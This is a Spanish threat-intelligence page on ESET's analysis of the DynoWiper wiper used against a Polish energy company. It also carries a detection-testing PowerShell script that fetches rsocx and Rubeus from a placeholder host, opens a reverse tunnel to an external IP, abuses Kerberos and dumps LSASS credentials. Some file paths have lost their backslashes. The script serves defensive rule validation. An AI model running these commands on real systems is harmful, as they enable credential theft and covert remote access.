SOC Prime Bias: Crítico

04 Feb 2026 15:19 UTC

ESET Research DynoWiper actualización: Análisis técnico y atribución

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
ESET Research DynoWiper actualización: Análisis técnico y atribución
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

DynoWiper es un wiper destructivo utilizado contra una organización del sector energético en Polonia, afectando múltiples endpoints en las operaciones. Los ejecutables fueron almacenados en una ubicación de red compartida y lanzados directamente desde ese recurso. ESET atribuye la actividad a Sandworm con confianza media. Una vez ejecutado, el malware corrompe archivos específicos con bytes aleatorios y provoca un reinicio forzado para completar el impacto.

Investigación

ESET recuperó tres muestras: schtask.exe, schtask2.exe y _update.exe, que fueron descargadas en C:inetpubpub. Las rutas de PDB incrustadas sugieren que los binarios fueron compilados en un entorno Vagrant. La ingeniería inversa mostró un proceso de borrado en tres pasos, con dos variantes insertando una pausa de cinco segundos entre las fases. Los artefactos tras el compromiso también incluyeron la herramienta Kerberos Rubeus y un proxy SOCKS5 rsocx dentro de la red de la víctima.

Mitigación

ESET PROTECT en los sistemas de la víctima bloqueó las tres variantes, limitando el daño. Reduzca la exposición previniendo la creación no autorizada de tareas programadas y monitoreando escrituras inesperadas en directorios compartidos. Añada listas de permitidos de aplicaciones y prohíba la ejecución desde recursos compartidos de red siempre que sea posible.

Respuesta

Identifique y aísle los hosts que ejecuten schtask.exe, schtask2.exe o *_update.exe desde un recurso compartido. Preserve la evidencia volátil, revise las tareas programadas y rastros de despliegue de PowerShell, y elimine herramientas como Rubeus y rsocx. Complete una forensica completa y restaure los datos de copias de seguridad limpias verificadas.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: La verificación de Pre-vuelo de Telemetría y Línea Base debe haber sido aprobada.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a diagnósticos erróneos.

  • Narrativa de Ataque y Comandos:

    1. Establecer un proxy SOCKS5 inverso usando rsocx.exe. El adversario descarga el binario de un servidor externo, lo coloca en %TEMP%, y lo ejecuta con el argumento -r 31.172.71.5:8008 para crear un túnel reverso de vuelta al host C2.
    2. Cometer abuso de tickets Kerberos con rubeus.exe. La herramienta se ejecuta para solicitar un ticket de concesión de ticket Kerberos (TGT) para la cuenta de administrador de dominio y posteriormente falsificar un ticket de servicio (s4u2self).
    3. Volcado de memoria de LSASS usando procdump.exe (una alternativa común al Administrador de Tareas) para capturar material de credenciales. Sysmon registra un evento de Acceso a Proceso donde el procdump.exe proceso del atacante accede a lsass.exe con la máscara de acceso concedida 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
  • Script de Prueba de Regresión:

    # -------------------------------------------------------------
    # Script de simulación – activa la regla Sigma para rsocx, rubeus,
    # y volcado de LSASS. Ejecutar con privilegios administrativos.
    # -------------------------------------------------------------
    
    # 1. Implementa rsocx.exe (proxy SOCKS5 inverso)
    $rsocxPath = "$env:TEMPrsocx.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath
    Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden
    
    # 2. Implementa rubeus.exe (abuso de Kerberos)
    $rubeusPath = "$env:TEMPrubeus.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath
    Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden
    
    # 3. Volcar LSASS usando procdump (requiere Sysinternals)
    $procdumpPath = "$env:TEMPprocdump.exe"
    Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip"
    Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force
    $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1
    if ($procdumpExe) {
        Copy-Item $procdumpExe.FullName $procdumpPath -Force
        Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait
    }
    
    Write-Host "Simulación completada. Verificar SIEM para alertas."
  • Comandos de Limpieza:

    # Termina cualquier proceso malicioso persistente
    Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Elimina binarios y archivos de dump
    Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue
    
    # Opcionalmente elimina directorios temporales de descarga
    Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Limpieza finalizada."